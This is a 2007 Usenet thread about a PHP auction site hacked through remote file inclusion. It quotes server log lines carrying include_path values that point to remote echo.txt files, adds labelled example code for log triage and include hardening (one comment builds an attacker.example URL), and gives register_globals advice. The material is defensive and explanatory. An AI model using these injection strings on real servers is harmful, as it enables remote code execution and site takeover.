Effect of "include_path" on URL of PHP script
on 15.10.2007 03:56:16 by Charles Crume
Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL is. A number of entries show a code
404 as the culprits are obviously phishing for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server or how I've got Apache
configured?
TIA.
Charles...
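As an added example that is not part of the thread, a small PHP command-line script that triages log lines like the ones above: it parses the combined-log format, flags any query parameter carrying a remote URL (not only include_path, since scanners vary the name), and separates the 200s, where the local script actually ran, from the 404 probes. The sample array holds three entries from the post with the line-wrap artefacts removed plus one constructed benign request (198.51.100.7).

```php
<?php
// Added example, not code from the thread: triages Apache combined-log lines for
// query parameters that carry a remote URL, the probe pattern in the entries above.
// Every parameter is checked, not only include_path, since scanners vary the name.
// 200 = the local script ran with the injected value; 404 = the probed file is absent.

// ip ident user [time] "method target proto" status bytes "referer" "agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"$/';
// A parameter whose value starts with a URL scheme. The (?:^|[?&]) prefix also
// matches the nested "?id=268/...inc.php?include_path=http://..." form in the log,
// which parse_str() would swallow into the value of "id".
const REMOTE_PARAM_RE = '/(?:^|[?&])([^=&]+)=((?:https?|ftp):\/\/[^&\s]*)/i';
function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'target' => $m[4],
        'status' => (int) $m[5],
        'bytes'  => $m[6] === '-' ? 0 : (int) $m[6],
        'agent'  => $m[7],
    ];
}

// Returns the requested script, the offending parameter and its URL, or null.
function find_remote_include(string $target): ?array
{
    $q = strpos($target, '?');
    if ($q === false) {
        return null;
    }
    $query = urldecode(substr($target, $q + 1));   // also catches %3A%2F%2F-encoded schemes
    if (!preg_match(REMOTE_PARAM_RE, $query, $m)) {
        return null;
    }
    return ['script' => substr($target, 0, $q), 'param' => $m[1], 'url' => $m[2]];
}

function triage(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null || ($hit = find_remote_include($r['target'])) === null) {
            continue;
        }
        // Whether a 200 really fetched the URL depends on the script and on
        // allow_url_fopen/allow_url_include, so the verdict is "inspect", not "compromised".
        $findings[] = $hit + [
            'ip'      => $r['ip'],
            'status'  => $r['status'],
            'bytes'   => $r['bytes'],
            'agent'   => $r['agent'],
            'verdict' => $r['status'] === 200 ? 'script executed: inspect it' : 'probe: file absent',
        ];
    }
    return $findings;
}

// Sample: three entries from the post (wrap artefacts removed) plus one constructed benign request.
$sample = [
    '69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"',
    '213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"',
    '213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [11/Oct/2007:15:50:00 -0400] "GET /auction/item.php?id=268 HTTP/1.1" 200 56200 "-" "Mozilla/5.0"',
];
foreach (triage($sample) as $f) {
    printf("%-15s %d %6d %s %s=%s [%s]\n",
        $f['ip'], $f['status'], $f['bytes'], $f['script'], $f['param'], $f['url'], $f['verdict']);
}
```

Run it with `php triage.php`; the benign fourth line produces no finding, the first two are reported as executed, the third as a probe.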
Re: Effect of "include_path" on URL of PHP script
on 15.10.2007 04:28:57 by Jerry Stuckle
Charles Crume wrote:
The include_path itself in the URL is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================
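Added example, not the auction package's code: the register_globals-era include pattern that makes a URL include_path dangerous is shown in the header comment, followed by a hardened settings.inc.php that fixes the include directory, refuses direct requests, and validates every include name. The hostname attacker.example and the file name lib/db.inc.php are placeholders.

```php
<?php
// Added example, not the auction package's code: a hardened settings.inc.php
// beside the register_globals-era pattern it replaces.
//
// The pattern that made the logged requests work looked like this:
//
//     include($include_path . '/lib/db.inc.php');
//
// With register_globals = On every request parameter becomes a global, so
// GET /auction/includes/settings.inc.php?include_path=http://attacker.example/echo.txt?
// (hostname constructed) arrives as $include_path = 'http://attacker.example/echo.txt?'.
// The include target becomes http://attacker.example/echo.txt?/lib/db.inc.php: the
// trailing "?" turns "/lib/db.inc.php" into a harmless query string, and with
// allow_url_fopen on (the default before PHP 5.2 gated remote includes behind
// allow_url_include) the remote file is fetched and executed as PHP. That is why
// the 200 responses in the log carry far more bytes than the page itself.

// 1. An include file must never be the requested script. When index.php includes
//    this file, SCRIPT_FILENAME is index.php; when it is requested directly it is
//    this file, and the request is refused before anything else runs.
if (realpath($_SERVER['SCRIPT_FILENAME']) === __FILE__) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// 2. The include directory is fixed from this file's own location, never from
//    request data, and a constant cannot be overwritten by register_globals.
define('AUCTION_INCLUDE_PATH', __DIR__);

// 3. Every include goes through one function that rejects URLs and stream
//    wrappers (anything containing a scheme separator), NUL bytes, and paths
//    that resolve outside the include directory.
function auction_include(string $relative): void
{
    if (strpos($relative, ':') !== false || strpos($relative, "\0") !== false) {
        throw new RuntimeException("refusing include name with ':' or NUL: $relative");
    }
    $full = realpath(AUCTION_INCLUDE_PATH . '/' . $relative);
    if ($full === false || strpos($full, AUCTION_INCLUDE_PATH . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("include resolves outside the include directory: $relative");
    }
    require_once $full;
}

auction_include('lib/db.inc.php');   // placeholder file name
```

In php.ini, pair this with register_globals = Off and allow_url_include = Off (the setting that gates remote includes since PHP 5.2); register_globals itself was removed in PHP 5.4.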
Re: Effect of "include_path" on URL of PHP script
on 16.10.2007 04:36:15 by Charles Crume
Hi Jerry;
Thanks!!!
I am using an auction software package that *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
Re: Effect of "include_path" on URL of PHP script
on 16.10.2007 04:42:37 by Jerry Stuckle
Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package that *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...
If your software is so old that it requires register_globals, it
probably has other security holes, also.
If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.
Re: Effect of "include_path" on URL of PHP script
on 16.10.2007 04:43:26 by Jerry Stuckle
Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package that *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...
And I forgot - please don't top post. Thanks.
Re: Effect of "include_path" on URL of PHP script
on 16.10.2007 15:28:48 by Jean Gaudreau
On Oct 14, 9:56 pm, "Charles Crume" wrote:
Hi,
I've been the target also of a hacker, with the same attack.
Add this to your script:
=====
$php_self = $_SERVER['PHP_SELF'];
// Only act when this include file is requested directly and register_globals is on.
// The ini name must be quoted: a bare register_globals is an undefined constant.
if (($php_self == "/auction/includes/settings.inc.php") &&
    (ini_get('register_globals'))) {
    $rg = array_keys($_REQUEST);
    foreach ($rg as $var) {
        // With register_globals, each request key also exists as a global variable.
        if (isset($$var) && $_REQUEST[$var] === $$var) {
            unset($$var);   // drop the injected global
            exit;           // and stop before any include() can use it
        }
    }
}
=======
This will check if they are running the file; if register_globals is
enabled, it catches the parameters, unsets them and then halts the script.
So far it is working.
Jean
Re: Effect of "include_path" on URL of PHP script
on 16.10.2007 20:55:41 by Michael Fesser
.oO(Charles Crume)
>I am using an auction software package that *requires* register_globals to be
>enabled.
You shouldn't use it anymore; look for a better script that doesn't
rely on insecure and deprecated features. register_globals is history
and will be completely dropped with PHP 6.
Micha
Re: Effect of "include_path" on URL of PHP script
on 18.10.2007 01:22:07 by Charles Crume
Hi Jean;
This has to be added to every script, correct? (If so, it would be too much
work and I would be better off purchasing newer auction software.)
I am also looking at using mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?
TIA.
Charles...
"Jean Gaudreau" wrote in message
news:1192541328.007138.293000@i13g2000prf.googlegroups.com...
Re: Effect of "include_path" on URL of PHP script
on 18.10.2007 01:23:17 by Charles Crume
I know... however, this is easier said than done. Lots of work to re-enter
customer info, sales info, items, etc.
Hopefully I will find another solution.
Thanks.
Charles...
"Michael Fesser" wrote in message
news:c62ah31882el64mccf39u37n8utb5ku9i6@4ax.com...
> .oO(Charles Crume)
>
>>I am using an auction software package that *requires* register_globals to be
>>enabled.
>
> You shouldn't use it anymore and look for a better script, that doesn't
> rely on insecure and deprecated features. register_globals is history
> and will be completely dropped with PHP 6.
>
> Micha
Re: Effect of "include_path" on URL of PHP script
on 18.10.2007 01:30:13 by unknown
Post removed (X-No-Archive: yes)
Re: Effect of "include_path" on URL of PHP script
on 18.10.2007 02:37:31 by Bucky Kaufman
"Gary L. Burnore" wrote in message
news:ff65u5$ag1$2@blackhelicopter.databasix.com...
> On Wed, 17 Oct 2007 19:23:17 -0400, "Charles Crume" wrote:
>
>>I know... however, this is easier said than done. Lots of work to re-enter
>>customer info, sales info, items, etc.
>>
>>Hopefully I will find another solution.
>>
>>Thanks.
>>
>>Charles...
>
> What's with the recent rash of top posters?
Google noticed the activity in this group doubled, although it's mostly
spam.